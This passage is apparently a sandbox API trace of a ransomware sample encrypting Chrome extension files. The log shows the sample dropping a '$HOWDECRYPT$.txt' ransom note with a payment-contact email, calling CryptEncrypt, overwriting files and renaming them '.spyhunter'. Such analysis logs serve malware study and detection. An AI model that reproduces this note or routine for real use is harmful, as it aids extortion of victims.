HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\id\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\id\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0157.323] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\id\\messages.json") returned 164 [0157.323] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0157.323] GetProcessHeap () returned 0x2c0000 [0157.323] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0157.323] ReadFile (in: hFile=0xa0, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cebec, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x25cebec*=0x2800, lpOverlapped=0x0) returned 1 [0157.335] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0157.335] WriteFile (in: hFile=0xa0, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25cebec, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x25cebec*=0x2800, lpOverlapped=0x0) returned 1 [0157.335] GetProcessHeap () returned 0x2c0000 [0157.335] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0157.335] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0157.335] WriteFile (in: hFile=0xa0, lpBuffer=0x25cec2c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cebec, lpOverlapped=0x0 | out: lpBuffer=0x25cec2c*, lpNumberOfBytesWritten=0x25cebec*=0x4, lpOverlapped=0x0) returned 1 [0157.353] WriteFile (in: hFile=0xa0, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cebec, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x25cebec*=0x30, lpOverlapped=0x0) returned 1 [0157.353] CloseHandle (hObject=0xa0) returned 1 [0157.353] GetProcessHeap () returned 0x2c0000 [0157.353] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0157.353] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\id\\messages.json.spyhunter") returned 174 [0157.353] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\id\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\id\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\id\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\id\\messages.json.spyhunter")) returned 1 [0157.355] GetProcessHeap () returned 0x2c0000 [0157.355] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0157.355] GetProcessHeap () returned 0x2c0000 [0157.355] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0157.355] GetProcessHeap () returned 0x2c0000 [0157.355] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x30062a8 | out: hHeap=0x2c0000) returned 1 [0157.355] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\gu\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\gu\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0157.356] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0157.356] WriteFile (in: hFile=0xa0, lpBuffer=0x25ceb5f*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x25cec88, lpOverlapped=0x0 | out: lpBuffer=0x25ceb5f*, lpNumberOfBytesWritten=0x25cec88*=0x127, lpOverlapped=0x0) returned 1 [0157.357] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0157.357] WriteFile (in: hFile=0xa0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x25cec88, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x25cec88*=0x2ac, lpOverlapped=0x0) returned 1 [0157.357] CloseHandle (hObject=0xa0) returned 1 [0157.357] GetProcessHeap () returned 0x2c0000 [0157.357] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f25978 | out: hHeap=0x2c0000) returned 1 [0157.357] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cec28 | out: pbBuffer=0x25cec28) returned 1 [0157.357] GetProcessHeap () returned 0x2c0000 [0157.357] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0157.357] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25cec20*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25cec20*=0x30) returned 1 [0157.358] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\gu\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\gu\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0157.358] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\gu\\messages.json") returned 164 [0157.358] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0157.358] GetProcessHeap () returned 0x2c0000 [0157.358] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0157.358] ReadFile (in: hFile=0xa0, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cebe4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x25cebe4*=0x2800, lpOverlapped=0x0) returned 1 [0157.517] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0157.517] WriteFile (in: hFile=0xa0, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25cebe4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x25cebe4*=0x2800, lpOverlapped=0x0) returned 1 [0157.518] GetProcessHeap () returned 0x2c0000 [0157.518] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0157.518] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0157.518] WriteFile (in: hFile=0xa0, lpBuffer=0x25cec24*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cebe4, lpOverlapped=0x0 | out: lpBuffer=0x25cec24*, lpNumberOfBytesWritten=0x25cebe4*=0x4, lpOverlapped=0x0) returned 1 [0157.519] WriteFile (in: hFile=0xa0, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cebe4, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x25cebe4*=0x30, lpOverlapped=0x0) returned 1 [0157.519] CloseHandle (hObject=0xa0) returned 1 [0157.519] GetProcessHeap () returned 0x2c0000 [0157.519] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0157.519] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\gu\\messages.json.spyhunter") returned 174 [0157.519] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\gu\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\gu\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\gu\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\gu\\messages.json.spyhunter")) returned 1 [0157.520] GetProcessHeap () returned 0x2c0000 [0157.521] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0157.521] GetProcessHeap () returned 0x2c0000 [0157.521] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0157.521] GetProcessHeap () returned 0x2c0000 [0157.521] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f257e0 | out: hHeap=0x2c0000) returned 1 [0157.521] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fa\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fa\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0157.522] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0157.522] WriteFile (in: hFile=0xa0, lpBuffer=0x25ceb57*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x25cec80, lpOverlapped=0x0 | out: lpBuffer=0x25ceb57*, lpNumberOfBytesWritten=0x25cec80*=0x127, lpOverlapped=0x0) returned 1 [0157.523] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0157.523] WriteFile (in: hFile=0xa0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x25cec80, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x25cec80*=0x2ac, lpOverlapped=0x0) returned 1 [0157.524] CloseHandle (hObject=0xa0) returned 1 [0157.524] GetProcessHeap () returned 0x2c0000 [0157.524] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f24e50 | out: hHeap=0x2c0000) returned 1 [0157.524] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cec20 | out: pbBuffer=0x25cec20) returned 1 [0157.524] GetProcessHeap () returned 0x2c0000 [0157.524] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0157.524] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25cec18*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25cec18*=0x30) returned 1 [0157.524] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fa\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fa\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0157.525] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fa\\messages.json") returned 164 [0157.525] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0157.525] GetProcessHeap () returned 0x2c0000 [0157.525] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0157.525] ReadFile (in: hFile=0xa0, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cebdc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x25cebdc*=0x2800, lpOverlapped=0x0) returned 1 [0157.527] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0157.527] WriteFile (in: hFile=0xa0, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25cebdc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x25cebdc*=0x2800, lpOverlapped=0x0) returned 1 [0157.527] GetProcessHeap () returned 0x2c0000 [0157.527] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0157.527] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0157.527] WriteFile (in: hFile=0xa0, lpBuffer=0x25cec1c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cebdc, lpOverlapped=0x0 | out: lpBuffer=0x25cec1c*, lpNumberOfBytesWritten=0x25cebdc*=0x4, lpOverlapped=0x0) returned 1 [0157.528] WriteFile (in: hFile=0xa0, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cebdc, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x25cebdc*=0x30, lpOverlapped=0x0) returned 1 [0157.528] CloseHandle (hObject=0xa0) returned 1 [0157.528] GetProcessHeap () returned 0x2c0000 [0157.528] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0157.529] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fa\\messages.json.spyhunter") returned 174 [0157.529] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fa\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fa\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fa\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fa\\messages.json.spyhunter")) returned 1 [0157.530] GetProcessHeap () returned 0x2c0000 [0157.530] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0157.530] GetProcessHeap () returned 0x2c0000 [0157.530] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0157.530] GetProcessHeap () returned 0x2c0000 [0157.530] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f24cb8 | out: hHeap=0x2c0000) returned 1 [0157.530] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\et\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\et\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0157.531] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0157.531] WriteFile (in: hFile=0xa0, lpBuffer=0x25ceb4f*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x25cec78, lpOverlapped=0x0 | out: lpBuffer=0x25ceb4f*, lpNumberOfBytesWritten=0x25cec78*=0x127, lpOverlapped=0x0) returned 1 [0157.531] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0157.532] WriteFile (in: hFile=0xa0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x25cec78, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x25cec78*=0x2ac, lpOverlapped=0x0) returned 1 [0157.532] CloseHandle (hObject=0xa0) returned 1 [0157.532] GetProcessHeap () returned 0x2c0000 [0157.532] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f24b20 | out: hHeap=0x2c0000) returned 1 [0157.532] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cec18 | out: pbBuffer=0x25cec18) returned 1 [0157.532] GetProcessHeap () returned 0x2c0000 [0157.532] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0157.532] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25cec10*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25cec10*=0x30) returned 1 [0157.532] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\et\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\et\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0157.533] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\et\\messages.json") returned 164 [0157.533] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0157.533] GetProcessHeap () returned 0x2c0000 [0157.533] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0157.533] ReadFile (in: hFile=0xa0, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cebd4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x25cebd4*=0x2800, lpOverlapped=0x0) returned 1 [0157.534] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0157.534] WriteFile (in: hFile=0xa0, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25cebd4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x25cebd4*=0x2800, lpOverlapped=0x0) returned 1 [0157.535] GetProcessHeap () returned 0x2c0000 [0157.535] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0157.535] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0157.535] WriteFile (in: hFile=0xa0, lpBuffer=0x25cec14*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cebd4, lpOverlapped=0x0 | out: lpBuffer=0x25cec14*, lpNumberOfBytesWritten=0x25cebd4*=0x4, lpOverlapped=0x0) returned 1 [0157.537] WriteFile (in: hFile=0xa0, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, 